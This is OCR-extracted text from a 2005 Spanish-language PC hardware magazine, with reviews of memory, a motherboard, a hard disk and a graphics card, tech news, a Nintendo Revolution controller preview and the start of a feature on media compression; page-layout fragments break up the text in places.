n la actualidad, y hasta que AMD comience a soportar DDR2 en sus procesadores, los usuarios de PC tenemos dos opciones: DDR y DDR2. Hasta hace un tiempo, el uso de DDR2 estaba limitado a aquellos que querían armar equipos de gama alta con procesadores Intel, y no resultaba del todo conveniente debido al precio (antes, costaban casi el doble que las DDR de la misma frecuencia) y la performance (puesto que, en general, las DDR2 usan mayores latencias que las DDR convencionales). Pero ahora la situación ha cambiado mucho. A partir del tercer trimestre de 2005, Intel (junto con algunos fabricantes de memorias, como Corsair) inició una campaña para fomentar el uso de memorias DDR2, lo cual implicó una gran disminución de precios. Así es que, en algunos comercios, se pueden ver precios similares entre memorias DDR2 533 y DDR 400. Por otro lado, la performance es un tema bastante discutible, dado que las DDR2 a 667 MHz con latencias relajadas pueden ofrecer un rendimiento superior a las DDR 400 con latencias apretadas (siempre hablando de plataformas Pentium 4), y, con el advenimiento de DDR2 a 800 y 1000 MHz, la diferencia se va haciendo más holgada día a día. Hoy me toca probar uno de los mejores productos existentes en el mercado: el kit de módulos Corsair XMS2-5400UL, diseñados para funcionar en Dual Channel. Cada uno cuenta con 512 MB, lo cual totaliza 1 GB de RAM.

FABRICANTE CORSAIR SITIO WEB WWW.CORSAIRMEMORY.COM PRECIO U$S 338

LA SOBRIEDAD DE SUS DISIPADORES DEMUESTRA QUE ESTE PRODUCTO ESTA ORIENTADO, EXCLUSIVAMENTE, A LOS ENTUSIASTAS DEL RENDIMIENTO, Y DEJA UN POCO DE LADO A LOS FANATICOS DEL MODDING.

sabe muy bien que las latencias apretadas ofrecen buenas mejoras de rendimiento en equipos basados en su tecnología. ¿Y qué ocurre si usamos estos módulos con otros chipsets? Siendo módulos pensados para los más fanáticos del rendimiento, no tendría mucho sentido usarlos en mothers con chipsets de nivel medio, como el Intel i915 y el i925, ya que éstos, por lo general, no admiten frecuencias muy superiores a 667 MHz y tampoco se ven beneficiados por las bajas latencias. No obstante, para usarlos con placas de este tipo, Corsair puso timings de 4-4-4-12 en el SPD.

OVERCLOCKING Bajo el disipador negro de modestas dimensiones hay ocho chips de la firma Micron Technologies (MT), los cuales están certificados para operar con latencias de 5-5-5-15 a 667 MHz y 1,8 V. Sin embargo, en nuestras pruebas pudimos alcanzar excelentes timings de 3-3-2-8 a esta frecuencia y tensión de trabajo. Con los 2,1 V nominales (que sólo se pueden alcanzar con mothers de buenas prestaciones) llegamos hasta 720 MHz con 3-2-2-8, algo que, sin lugar a dudas, es excelente. Con latencias de 4-3-3-9 es posible superar los 800 MHz, en tanto que con 5-4-4-9 se puede alcanzar la barrera de los 1000 MHz (pero con 2,3 V). Por lo tanto, estos módu-

los son adecuados para chipsets tanto NVIDIA (que prefieren latencias bajas) como Intel (beneficiados por altas frecuencias).

CONCLUSION Sin temor a equivocarme, puedo decir que este kit de Corsair es el mejor en lo que respecta a performance y versatilidad, ya que puede ofrecernos el mejor rendimiento en cualquier plataforma que utilicemos. Incluso, lo prefiero respecto al kit XMS28000UL de la misma compañía (1 GHz a 5-4-4-9), reconocido como el más adecuado para chipsets Intel i945 y 955X. Pero tiene un punto realmente muy bajo y es el precio: no todos los usuarios pueden gastar más de U$S 300 en 1 GB de RAM (el doble de lo que cuestan las más económicas DDR2 533 a 4-4-4-12), y los beneficios al exprimirlas al máximo no ofrecen un rendimiento muy superior al 20 o 30%, en los mejores casos. Por ende, este producto puede recomendarse, exclusivamente, para los más grandes entusiastas del rendimiento que deseen sacar el máximo provecho al resto de los componentes de su equipo. ■ Ariel Gentile | genaris@mpediciones.com

»

CARACTERISTICAS UNICAS. VERSATILIDAD Y OVERCLOCKING. NO INCLUYE EXTRAS. PRECIO MUY ELEVADO.

POWERUSR


10-11-Labo ECS-P26.qxd

.lab

11/2/05

3:11 PM

Page 10

ECS KN1 SLI EXTREME

FABRICANTE ECS SITIO WEB WWW.ECSUSA.COM PRECIO U$S 180

litegroup Computer Systems es uno de los principales fabricantes de motherboards en el mundo. No sólo ensambla las placas madre de sus propias marcas, sino que también se encarga de producir gran parte de los modelos de compañías más “prestigiosas”, como es el caso de Abit. Por tal razón, no se puede dudar de su construcción, cuidadosamente realizada por un gran número de operarios y con una infraestructura fenomenal. Una de las marcas de esta compañía es la conocida PC Chips, la low-end y la que más se ve en nuestros pagos. Pero también tiene dos marcas más, de las cuales una es homónima, y está dirigida al segmento medio; mientras que la otra es la línea de motherboards “ECS Extreme”, dedicada a los máximos entusiastas de PC. La placa que analizamos pertenece a esta última línea.

E

PACKAGING Y ACCESORIOS

»

Ya desde el packaging se nota una importante diferencia con respecto a otros productos (más modestos) de la misma empresa. Al abrir la caja, nos encontramos con el mother, bajo el cual hay una pequeña caja que contiene, prolijamente, todo el juego de accesorios. Todos los cables que necesitamos están presentes: cuatro S-ATA (y un adaptador de alimentación para dos unidades), dos P-ATA y uno de disquetera (todos sin redondear). Además, se incluye un bracket con dos puertos USB y dos FireWire (junto con un adaptador para montarlos en una bahía frontal de 3,5”), uno de puerto paralelo y uno con un puerto eSATA. Este último se conecta a un puerto S-ATA interno y sirve para utilizar esta nueva interfaz, de 300 MB/s, que promete desplazar a la USB 2.0 en un futuro cercano. Dado que no muchos mothers lo traen, es un excelente agregado. También se observan el puente para SLI y un curioso bracket que sirve para retenerlo (sinceramente, no le encontré mucho sentido). Otro elemento atípico es un cable de red cruzado de 2 metros, que, si bien resulta extraño, es útil. Tal vez, su inclusión se deba a que, en uno de los dos CDs suministrados (el otro tiene los drivers), el fabricante colocó varios programas dedicados al control de la PC por medio de la red y por control remoto. Como si todos estos accesorios únicos fueran poco, lo más interesante para mencionar es lo que se denomina Top-Hat Flash. Se trata de un BIOS extra que está colocado sobre un zócalo, y que sirve como backup: si se nos corrompe el BIOS de la PC, lo

colocamos por encima de este último y encendemos el equipo, que arrancará con el BIOS de backup; luego de bootear, le quitamos el “sombrerito” al BIOS viejo y lo reprogramamos (desde Windows) utilizando una aplicación incluida en el CD de instalación (Award WinFlash). Una idea muy práctica y original.

EL MOTHERBOARD La palabra que mejor define a su diseño es “limpieza”. No da la impresión de tener muchas funcionalidades, aunque dentro de su PCB hay una gran cantidad de puertos y conectores. La combinación de colores es bastante clara y coqueta, con lo cual resulta un producto interesante para los fans del modding. En cuanto a la distribución de componentes, es sencillamente excelente: ningún puerto se bloquea por el uso de placas grandes. El único aspecto criticable es la ubicación de los zócalos de memoria (que exigen quitar la placa PCIE x16 superior al insta-

»

* 10

EN EL PANEL TRASERO VEMOS LA SALIDA DEL COOLER QUE REFRIGERA LA ETAPA DE ALIMENTACION DE LA CPU. ES INTERESANTE LA INCLUSION DE SALIDAS DIGITALES DE AUDIO (OPTICA Y RCA).

COMO SE PUEDE OBSERVAR, LA SEPARACION ENTRE LOS SLOTS PCIE X16 ES MAS GRANDE QUE LA DE OTROS MOTHERS, LO QUE MEJORA LA REFRIGERACION.

CARACTERISTICAS TECNICAS

CHIPSET : NVIDIA NFORCE4 SLI ZOCALO : SOCKET 939 MEMORIA : 4 ZOCALOS DDR (DUAL CHANNEL) SLOTS DE EXPANSION : 2 PCIE X16, 1 PCIE X1, 3 PCI AUDIO : AC’97 8 CANALES (CODEC REALTEK ALC850) RED : 1 GBPS (MARVELL 88E1111) Y 100 MBPS (REALTEK 8100C) P-ATA/S-ATA : 2 / 6 (300 MB/S) USB : 10 PUERTOS USB 2.0 FIREWIRE : 2 PUERTOS IEEE 1394A (CONTROLADOR TEXAS TSB43AB22A)

POWERUSR


.lab

NOVATECH DDR 333 / 256 MB

ovatech Solutions S.A. es una empresa de la que, seguramente, muchos de nuestros lectores habrán oído hablar. Se trata de la única compañía de Latinoamérica que se dedica al ensamblado de módulos de memoria para computadoras. Lo que más le interesa a Novatech es dejar en claro que la calidad de sus módulos es equiparable con la de los “de marca”, pero tienen el precio de cualquier módulo “genérico” que se encuentre en el mercado. Un valor agregado, además, es la garantía (de por vida): siempre será más sencillo dialogar con personal de RMA en español, que con el de alguna empresa que fabrica módulos genéricos.

N

EL MODULO Ya habíamos mostrado, en POWERUSR #19, un ejemplar de esta misma empresa. Se trataba de un módulo DDR 400 de 1 GB de capacidad. En esta ocasión, probamos uno más económico. Un aspecto para comentar es que Novatech ha cambiado de proveedor de chips de memoria con respecto a aquella edición; antes usaba

.lab

chips de Micron, y ahora utiliza memorias de Hynix. El módulo, presentado en un blister que contiene un pequeño manual explicativo y el logo Powered by Novatech (para pegar en el frente del gabinete), está certificado para operar a 166 MHz (DDR 333) con latencias de 2.5-3-3-7-2T. También puede funcionar con latencias 2-3-3-6-1T a 133 MHz.

LAS PRUEBAS Lo que más interesa a la hora de probar una memoria es su “aguante” a mayores frecuencias y menores latencias de trabajo. La verdad es que, siendo una memoria económica (cuesta casi lo mismo que cualquiera genérica), los resultados obtenidos son muy buenos. La mejor configuración de latencias estable que pude obtener fue de 2-2-2-5-1T a 166 MHz, mientras que la mayor frecuencia de trabajo alcanzada (con las latencias normales) fue de 240 MHz. Realmente, quedé anonadado con este

FABRICANTE SITIO WEB PRECIO

NOVATECH WWW.NOVATECH-ONLINE.COM U$S 32

último resultado: ¡casi un 50% de overclock! Eso sí: hay que tener en claro que la garantía se anula al aplicar esta técnica. En definitiva, creo que Novatech está lanzando buenos productos al mercado, y es una buena idea adquirir uno de estos módulos en PCs de gama baja y media, en vez de escoger módulos genéricos. En lo que respecta a este módulo en particular, es un muy buen producto y tiene buenas posibilidades de overclock. No obstante, puede ser mejor comprar un módulo DDR 400 de esta misma marca (que cuesta apenas U$S 1 o 2 más). ■ Ariel Gentile | genaris@mpediciones.com

«

BUEN PRECIO. GARANTIA DE POR VIDA. CAPACIDAD DE OVERCLOCK. PUEDE CONVENIR MAS UN DDR 400.

SAMSUNG SPINPOINT SP1213C

FABRICANTE SAMSUNG SITIO WEB WWW.SAMSUNG.COM PRECIO U$S 110

esde hace varios años, además de fabricar monitores y unidades ópticas, la empresa Samsung se dedica a producir discos duros. En sus comienzos, no tuvieron buena fama, en especial, debido a los índices de falla y al rendimiento (algo inferior al de sus pares). Sin embargo, en los últimos años ha mejorado mucho su tecnología, en particular en lo que se refiere al consumo de energía y la insonorización. El modelo evaluado es de la línea Spinpoint P (performance, 7200 RPM), que se subdivide en las series P80 (de 60 a 160 GB) y P120 (de 200 a 250 GB). Naturalmente, siendo de 120 GB, pertenece a la primera familia. Aquí hay tanto discos P-ATA como S-ATA (I y II), con 2 y 8 MB de buffer. Este en particular es S-ATA (150 MB/s) y con 8 MB de buffer, y tiene un precio aproximado de entre U$S 100 y 110 (o sea, el estándar).

competidor directo) y con un Seagate Barracuda 7200.8 (que está disponible desde los 200 GB y es un poco más caro que el modelo de Samsung con esta capacidad). Los resultados fueron satisfactorios, siendo (en promedio) un 10% más rápido que el Western Digital y un 10% más lento que el Seagate.

D

EL SP1213C A simple vista, parece un disco de la vieja usanza: tiene la misma cubierta que usa Samsung desde sus discos de 2 GB. 16

CONCLUSION Sin embargo, al mirar la placa controladora, notamos varias diferencias, como los conectores de alimentación (sólo el nuevo S-ATA, no tiene conexión Molex) y datos, de 7 pines. Vemos, básicamente, cinco chips, de los cuales dos son de la firma Marvell. Se trata del DSP 88i6522, pensado para interfaces ATA 133, y el “traductor” de ATA 133 a S-ATA 150 88i8030. Es decir que el disco es, internamente, ATA 133, y se utiliza un bridge para convertirlo a S-ATA. El resto de los chips son el controlador del motor, la memoria de buffer (Samsung SDRAM de 166 MHz) y el firmware. En lo que respecta a performance, lo comparé con un Western Digital WD1200JD (su

Si bien no tiene un rendimiento fantástico, debo decir que el disco de Samsung es el más silencioso que he probado y, además, genera poco calor. Por eso, puede ser muy recomendable para aquellos que deseen tener una PC silenciosa sin sacrificar demasiado el rendimiento. Los entusiastas del poder tal vez prefieran algún disco de la línea 7200.8 de Seagate o DiamondMax Plus 10 de Maxtor. ■ Ariel Gentile | genaris@mpediciones.com

«

INSONORIZACION. RENDIMIENTO ACEPTABLE. POCO CALOR GENERADO. PODRIA TENER CONECTOR MOLEX.

POWERUSR


14-Labo Radeon X550-P26.qxd

.lab

11/2/05

5:26 PM

Page 14

SAPPHIRE

RADEON X550 U

SAPPHIRE NOS MUESTRA UN NUEVO MODELO DE LA SERIE RADEON DE ATI PARA EL SEGMENTO ECONOMICO. CON UN PRECIO ADECUADO, ESTA PLACA NOS PROMETE UN BUEN RENDIMIENTO EN LA MAYORIA DE LOS JUEGOS A BAJAS Y MEDIAS RESOLUCIONES. Sapphire (y el más general actualmente), se incorporan 256 MB con bus de 128 bits. Esto posiciona al Radeon X550 en un nivel similar al de una GeForce 6200 “común”, cuyo precio es un poco superior, pero que agrega funcionalidades de Shader Model 3.0 y PureVideo. Así es que podríamos hablar del X550 como de un producto que se ubica entre las placas de gama baja y las de gama baja/media, con prestaciones decentes para la mayoría de los juegos, en resoluciones de 800 x 600 y 1024 x 768 (sin filtros gráficos).

DENTRO DEL X550 Una manera sencilla de definir a la Radeon X550 es tratarla como una versión PCI Express de la Radeon 9550. No es algo muy desacertado, ya que los núcleos de ambas (RV370 y RV350, respectivamente) son parecidos, con 4 pixel pipelines y 2 vertex pipelines, soportando Shader Model 2.0. Incluso, también se puede comparar la X550 con las X300, dado que el núcleo es exactamente el mismo. Sin embargo, las frecuencias de núcleo y memoria son algo mayores: 400/500 MHz, contra 325/400 MHz de su hermana menor (y los 250/400 MHz de la 9550). Al igual que el resto de los modelos, hay versiones con 128 y 256 MB, y con bus de memoria de 64 y 128 bits. En el caso de

» 14

HAY DOS VERSIONES DE LA PLACA: UNA CON REFRIGERACION PASIVA Y OTRA CON UN PEQUEÑO VENTILADOR. ESTA ULTIMA NO GENERA MUCHO RUIDO, ASI QUE ES IGUAL DE CONVENIENTE.

LA PLACA DE SAPPHIRE Sapphire ofrece su Radeon X550 en dos modelos, uno de los cuales utiliza sólo un disipador grande (“Silent”) y otro que posee un ventilador. El que me tocó evaluar es el segundo. Se trata de una placa compacta, como todas las de su clase, con ocho chips de RAM Hynix de 4 ns (justos para los 500 MHz nominales) sin ningún tipo de refrigeración. El cooler del núcleo consta de un disipador redondo de moderadas proporciones, que hace un buen trabajo en conjunto con un pequeño ventilador (ruidoso al momento del inicio) que se regula según la temperatura de la GPU. Los componentes de esta placa son similares a los vistos en las series 9600 y X300, como el regulador de tensión ISL6522 (para la GPU) y los MOSFETs APM3055L para la alimentación de la memoria (que consta de dos etapas). Sin ningún tipo de modificación, pude pasar de los 400 MHz nominales del núcleo hasta unos respetables 470 MHz, en tanto que la memoria se comportó correctamente a 560 MHz, sin ningún tipo de artifact. Sin dudas, es un overclock bastante moderado (mejora apenas un 10% la performance), pero aun así da buenos resultados si tenemos en cuenta el precio de la placa. Más allá de estos datos, puedo decir que el resto no difiere mucho de lo que vemos en otras placas: CD con drivers y utilidades

»

na vez más, nos llega un nuevo modelo de ATI, justo cuando pensábamos que no podían existir más productos distintos. En la actualidad, y dejando de lado a las casi difuntas GeForce FX 5200 y Radeon 9250 (con precios entre U$S 50 y 60), tenemos una interesante pelea en el segmento de gama baja entre las GeForce FX 5500 y las Radeon 9550 (que rondan los U$S 80-100), de interfaz AGP 8x. En los últimos meses se han incorporado dos variantes para la cada vez más común interfaz PCI Express x16: GeForce 6200 TC y Radeon X300SE HM. También tenemos las 6200 y X300 “normales” (es decir, con 128 MB onboard), con un precio un poquito mayor, aunque prácticamente no se pueden ver en nuestro mercado. La Radeon X550 es un modelo un poco superior al X300, con un precio bastante más alto. Básicamente, se trata del mismo chip, pero con frecuencias de clock más elevadas.

FABRICANTE SAPPHIRE SITIO WEB WWW.SAPPHIRETEH.COM PRECIO U$S 105

A SIMPLE VISTA, NO VEMOS NADA INNOVADOR EN ESTE MODELO: NO ES MAS QUE UN RADEON X300 CON MAYORES FRECUENCIAS DE TRABAJO.

para overclock, una copia de PowerDVD 5, versión de dos canales de audio (algo anticuada), interfaz DVI-I y salida a TV. En este último punto hay que aclarar que se incluye un adaptador de S-Video a RCA, y un jumper para configurar la norma en NTSC o PAL (útil cuando recién iniciamos la PC, sin driver de por medio).

EN DEFINITIVA Esta placa de Sapphire está bien definida en lo que respecta a las placas entry-level: con un interesante precio, no ofrece ningún valor agregado importante. Cumple con su trabajo, lo cual nos permite utilizar decentemente juegos como Doom 3 y Half Life 2 en resoluciones de 800 x 600; este hecho nos devuelve cada centavo invertido, gracias a su más que aceptable rendimiento por el precio. Las posibilidades de overclocking son bastante modestas para lo que estamos acostumbrados, en tanto que el software suministrado es prácticamente inexistente. Así que esta placa puede recomendarse a aquellos que sólo están interesados en un hardware que ofrezca una buena relación entre lo gastado y lo obtenido en cuanto a performance, sin preocuparse los extras suministrados. ■ Ariel Gentile | genaris@mpediciones.com

»

RELACION PRECIO/RENDIMIENTO. DISEÑO COMPACTO Y SILENCIOSO. OVERCLOCK MUY MODERADO. NINGUN AGREGADO INTERESANTE.

POWERUSR


64-Lo que viene-P26.qxd

.end

11/2/05

2:57 PM

Page 64

LO QUE VIENE EN ESTA SECCION NOS OCUPAMOS DE REVELAR LOS PRIMEROS INDICIOS DE LO QUE NOS DEPARA EL FUTURO DE LA TECNOLOGIA, PARA PODER ADELANTAR LO QUE OCURRIRA EN LOS PROXIMOS MESES.

LA VERDADERA REVOLUCION

EL PAD DE LA NINTENDO REVOLUTION

Aunque en un principio parezcan pocos botones los que acompañan el pad, en la práctica son suficientes. A los que se ven en la foto se les suman un gatillo en la parte posterior (para nuestro dedo índice)

» LA SIMPLICIDAD EN EL DISEÑO Y LA CAPACIDAD DE FUNCIONAMIENTO ATRAERAN A UNA NUEVA CAMADA DE GAMERS QUE NO SE LLEVAN BIEN CON LOS PADS ACTUALES. 64

ESTA BASE SERA LA ENCARGADA DE TRADUCIR NUESTROS MOVIMIENTOS AL JUEGO. SOPORTA HASTA CUATRO PADS SIMULTANEOS, UNA CARACTERISTICA MUY IMPORTANTE.

y la posibilidad de agregar un stick analógico u otro dispositivo para la mano izquierda. El principal es el A, el más grande de todos, con el cual, seguramente, habilitaremos un modo u otro de movimiento del pad. Al alcance del pulgar tenemos el direccional y tres botones secundarios: Start, Select y Home. Los primeros dos son clásicos, mientras que el restante denota la idea de hacer una Nintendo orientada también al uso de Internet, como hace actualmente la Xbox con su sistema Xbox Live!. Por último, hay un botón de encendido y uno de apagado en la parte superior izquierda, para optimizar el consumo energético. En la exposición realizada en Tokio, Saturo Iwata mostró las posibilidades de mando de la Nintendo Revolution a través de una serie de demostraciones. Algunas de ellas reflejaban situaciones como un juego de básquet de a dos jugadores (la consola soporta hasta cuatro controles de este tipo y al mismo tiempo). El control del balón se daba de forma muy natural, tanto en los pases como en los bloqueos ante tiros de adversarios. Al momento de lanzar, la mano se encargaba de fijar la dirección, mientras que el botón A realizaba el tiro. Todo un espectáculo. Lo cierto es que tendremos que esperar a que las compañías aprovechen esta tecnología y la implementen bien en sus juegos. Nintendo ha dado el primer paso hacia una revolución y nos muestra que todavía se puede innovar en el mundo de las consolas. Habrá que esperar hasta el año que viene para comprobar si esta nueva forma de jugar funciona o no.

»

JUGABILIDAD

»

penas vemos las fotos, se nos viene a la cabeza la idea de un control remoto. Si no hubiéramos puesto un título tan claro, difícilmente pensaríamos que este aparato corresponde a un nuevo diseño de gamepad para una consola. Saturo Iwata es el hombre detrás de esta innovadora idea, que, quizá, reivindique a Nintendo y la coloque al nivel que hoy alcanzan empresas como Microsoft o Sony… o la lleve a su perdición total. La primera aparición en funcionamiento de este pad se vio en el Tokyo Game Show 2005, donde todos quedaron impresionados. Allí se mostró cómo funcionaba este dispositivo y el porqué de su diseño. Básicamente, se trata de un gamepad inalámbrico que se comunica vía Bluetooth con una base ubicada al costado del televisor. ¿Dónde está la innovación? En su manejo. Ya no habrá que apretar un botón para avanzar o retroceder, para subir o bajar: todo lo haremos con el movimiento de la mano. Así es que, por ejemplo, el pegar con una espada o una raqueta será cuestión de desplazar el pad imitando el movimiento real necesario en esas circunstancias. Esto, que suena difícil de explicar, en la práctica representa una enorme cantidad de posibilidades. Según los muchachos de Nintendo, la captación de los desplazamientos realizados con el pad será extremadamente precisa. Esto significa que, si funciona tal como se mostró y anunció, cambiará radicalmente la forma de jugar un videojuego en una consola. Imagínense direccionar la mira del arma de un FPS con sólo mover el pad, como si estuviéramos apuntando de verdad. Los simuladores de vuelo también saldrían beneficiados con esta tecnología, ya que cualquier movimiento posible de un avión (incluso, rotar sobre su eje) podría realizarse usando este aparato.

A

POR SI FUERA POCO, EN LA PARTE INFERIOR SERA POSIBLE “ENCHUFAR” DISPOSITIVOS (COMO ESTE ANALOGICO) PARA COMPLEMENTAR EL MANEJO GENERAL DEL PAD. POWERUSR


04-08-News-P26.qxd

11/2/05

2:49 PM

Page 4

NEWS! OPTIMIZA LA PERFORMANCE

ATI DESCUBRE UN l trabajo de los muchachos de la empresa canadiense sobre la API OpenGL ha dado sus frutos. ATI puso a prueba una nueva herramienta que realiza cambios en el controlador de memoria, para lograr un acceso mucho más optimizado. La idea detrás de esta modificación es aumentar el rendimiento cuando está activado el Antialiasing en altas resoluciones. Una serie de pruebas efectuadas con estos cambios demuestran un incremento de performance de hasta un 35% en Doom 3, aunque el aumento sólo se ve reflejado en resoluciones superiores a 1024 x 768 (con los filtros activados, claro). Otros juegos, como Chronicles of Riddick o Serious Sam 2, ambos utilizando OpenGL, también se ven beneficiados por este tweak. La gente de ATI dice que éste es sólo

E

el comienzo, y lo cataloga como una “simple modificación del Registro”. Por lo pronto, los Catalyst 5.11 incorporarán esta interesante modificación, y se planea seguir trabajando para incluir en los beneficios a DirectX. Con el correr de los meses, cada versión de los drivers oficiales irá trayendo nuevas características referidas al tema, ya que se alega que se necesita un duro trabajo para convertir esta modificación en una solución viable que permita aprovechar mejor las GPU futuras que lanzará la empresa. Esto confirma un dicho de la informática que sostiene que el hardware no sirve de nada sin un buen software. ATI vuelve a demostrar que no logró posicionarse donde está sólo por sus chips gráficos sino, también, por su grupo de programadores de drivers.

»

TWEAK PARA OPENGL

DOOM 3 ES UNO DE LOS PRINCIPALES BENEFICIADOS POR ESTA MODIFICACION, PRINCIPALMENTE, CON LOS FILTROS ACTIVADOS.

DIMINUTO POR DONDE SE LO VEA

EL WEB SERVER MAS PEQUEÑO DEL MUNDO L

4

del tipo EEPROM (que cumple el papel de disco duro) y un regulador de tensión. Todo el conjunto se compara, en tamaño, con una caja de fósforos chica. Sus creadores afirman que el uso de iPic va más allá de, simplemente, alojar páginas web. Su bajo costo y sus diminutas dimensiones le otorgan un futuro prometedor a este dispositivo. Sólo resta esperar a ver cómo aprovechan sus ventajas y lo emplean en algo realmente interesante. Puede ver más fotos en www.ccs.cs.umass.edu/nshri/iPic.html

»

a miniaturización de la electrónica ha dado un paso más con la fabricación del iPic web server, la más pequeña implementación de un servidor web HTTP. El chip principal es el iPic, que funciona a 4 MHz e incluye la CPU, la memoria, un puerto serie y el generador de clock. Este dispositivo se conecta directamente a un router y funciona como cualquier servidor web existente, con lo cual otorga las páginas requeridas a nuestro navegador. El web server se completa con un chip

EL IPIC DEMUESTRA QUE EL CAMINO DE LA ELECTRONICA VA RUMBO A LA MINIATURIZACION DE LOS COMPONENTES. POWERUSR


04-08-News-P26.qxd

11/2/05

2:49 PM

Page 6

POWER ASUS EXTREME N7800GT DUAL

BREVES NOTICIAS DOS VECES BUENAS

HACER UN JUEGO PARA LA PS3 CUESTA UNA FORTUNA En la futura guerra de consolas que se aproxima el año entrante entre la Xbox 360 y la Playstation 3, parece que Microsoft va a tomar ventaja. Un sitio japonés afirma que desarrollar un juego para la nueva plataforma de Sony requiere un desembolso de 2 millones de yenes (aproximadamente, U$S 17,6 millones), solo para empezar. Esta noticia aterró a las compañías que planeaban construir sus títulos sobre la base de esta consola, y podrían dedicarse, en su lugar, a desarrollar para la Xbox 360. Gracias a las similares características que comparte con la PC (en cuanto a procesamiento gráfico), portar títulos de una a otra sería más sencillo que en el pasado. Para conocer más detalles sobre la PS3, recomendamos leer la nota de su chip principal (Cell) en POWERUSR #22.

YONAH HACE SU APARICION EL 1 DE ENERO DE 2006 La nueva gama de procesadores de Intel para notebooks estará disponible a principios de 2006, según lo anunciado por la empresa. Además del modelo Dual Core, una variante con un solo núcleo reemplazará al actual Pentium M, agregando la función de virtualización. En cuanto a velocidad, el rango va de 1,66 GHz a 2,16 GHz, todos con bus de 667 MHz. Existen versiones de bajo y ultra bajo consumo, con velocidades de clock menores (1,66 y 1,55 GHz para los primeros; 1,06 y 1,2 GHz para estos últimos). Mientras tanto, Intel sigue preparando Merom, también para portátiles, planeado para la segunda mitad de 2006.

UN SLI CON UNA

SOLA PLACA al como Gigabyte integró dos GeForce 6600 GT en un solo PCB en modo SLI, ASUS logró el mismo cometido utilizando el modelo GeForce 7800 GT, la versión reducida del 7800 GTX. La velocidad de trabajo de cada GPU es de 430 MHz, y cada una de ellas posee sus propios 256 MB GDDR3 de memoria (un total de 512 MB) funcionando a 600 MHz. Las dimensiones de esta placa son exageradamente altas, tanto que en algunos gabinetes puede que no entre. Con sus 24,5 cm de largo y 14,5 cm de alto, puede llegar a traer más de una complicación de espacio con el resto de los componentes. Además, y debido a su gran consumo, el paquete incluye una fuente de alimentación extra que se conecta directamente a la placa. El bundle se completa con cables adaptadores de diversos tipos, algunos programas como CyberLink Power Director y una copia del reconocido Call of Duty 2. Entre la lista de motherboards soportados, tenemos los modelos de ASUS P5ND2 y P5N32 para Pentium 4, y la serie A8N para Athlon 64, todos ellos

T

con capacidad de SLI (de lo contrario, no se puede activar este modo en los drivers de NVIDIA). También se pueden utilizar el DFI nF4 SLI-DR y el Gigabyte GA-K8NXP-SLI para alojar esta placa de video. Hablando un poco del rendimiento, las pruebas demuestran que los juegos que aprovechan SLI posicionan esta placa por encima de la GeForce 7800 GTX y la Radeon X1800 XT, algo realmente impresionante, aunque la diferencia (que no es poca) debería ser mayor que la lograda. En cambio, en títulos no preparados para SLI, notamos que alcanza un desempeño menor que las placas citadas, pero con un escaso margen. Con un precio de 600 euros en Europa, no parece que esta placa vaya a tener un éxito comercial, principalmente, porque se pueden adquirir dos GeForce 7800 GT por un precio bastante menor. Sólo para los fanáticos de lo sofisticado y novedoso, ASUS brinda un producto de edición limitada, con muy buenas prestaciones y de dimensiones (literalmente) pocas veces vistas.

NUEVAS GEFORCE 6600 CON MEMORIAS DDR2

6

»

Después de un fallido intento de incorporar este tipo de memorias en los modelos Radeon 9800 Pro de ATI y GeForce FX 5800 de NVIDIA, es esta última la que tiene la intención de largar su chip de rango medio con tecnología DDR2, dejando el tipo GDDR3 para las placas high-end. Gracias a esto, el clock de la GeForce 6600 se aumentó en un 15% para llegar a 350 MHz, y la velocidad de las memorias escaló a 800 MHz (contra 550 MHz de la original). Este cambio incrementa el ancho de banda de 4 GB/s a 12 GB/s. También subió la cantidad total, de 128 MB a 256 MB, con lo cual logra mantenerse en el sector medio del mercado gráfico actual.

CON UN SISTEMA DE REFRIGERACION DE ESTAS CARACTERISTICAS, EL NIVEL DE RUIDO ES LIGERAMENTE MAYOR QUE EL DE UNA GEFORCE 7800GTX. POWERUSR


22-33_Notapa-P26.qxd

11/2/05

5:03 PM

Page 22

AL DIGIT VIDEO E D N RESIO COMP A L E TOS D AMEN D N U F

IE AR

26

L

GE

N

E TIL

|

GE

NA

@ RIS

MP

ED

ON IC I

.CO

M

ES

POWERUSR


22-33_Notapa-P26.qxd

11/2/05

5:03 PM

Page 23

EL MANEJO DE AUDIO Y VIDEO DIGITAL ES UN TEMA MUY INTERESANTE, NO SOLO PORQUE ES AMPLIAMENTE UTILIZADO EN LA VIDA COTIDIANA, SINO TAMBIEN PORQUE CONLLEVA CONCEPTOS MUY COMPLEJOS DE CALCULO, QUE EXPRIMEN AL MAXIMO EL PODER DE LAS COMPUTADORAS. EN ESTA NOTA VAMOS A ANALIZAR LOS FUNDAMENTOS DE LOS PRINCIPALES ALGORITMOS DE COMPRESION Y DESCOMPRESION DE AUDIO Y VIDEO.

¿Alguna vez se pusieron a pensar en qué hacían con la PC hace varios años? Estoy seguro de que eran cosas muy distintas de las que hacen ahora. No era usual escuchar música con la computadora (ya que aún no se difundían formatos de compresión como MP3, y el hardware tampoco tenía la potencia suficiente como para utilizarlos) ni conectarse a Internet. No existían ICQ ni MSN Messenger, y éramos mucho más independientes de la PC. Hacíamos trabajos escolares, algunos diseños e impresiones, y jugábamos a algunos juegos populares de la época, pero el concepto de “multimedia” aún no estaba totalmente impuesto. Ni hablar de las películas: antes (a mediados de la década de 1990), a nadie se le ocurría ver películas en la PC. Lo más arriesgado era comprar una sintonizadora de TV y mirar algunos programas en una ventana o en pantalla completa. Justo en esa época empezaron a conocerse los primeros CODECs para codificar la información de video en un formato digital, como fue el caso de MPEG. Aún era bastante caro visualizar contenido multimedia en la PC, ya que las lectoras de CD y las placas de sonido eran costosas y, además, se necesitaba algún hardware especial para decodificar MPEG. Hoy, las cosas son muy diferentes: prácticamente todo se puede hacer con la computadora. Cada vez son menos los que siguen usando minicomponentes tradicionales para escuchar música, y son más los que utilizan la PC con varios gigabytes de MP3 u OGG que albergan todos sus temas favoritos organizados de una forma más cómoda. Incluso, se están haciendo populares las radios en Internet, de modo que aquellos que posean conexiones permanentes podrán prescindir absolutamente de las conexiones por aire (de amplitud y frecuencia modulada). POWERUSR

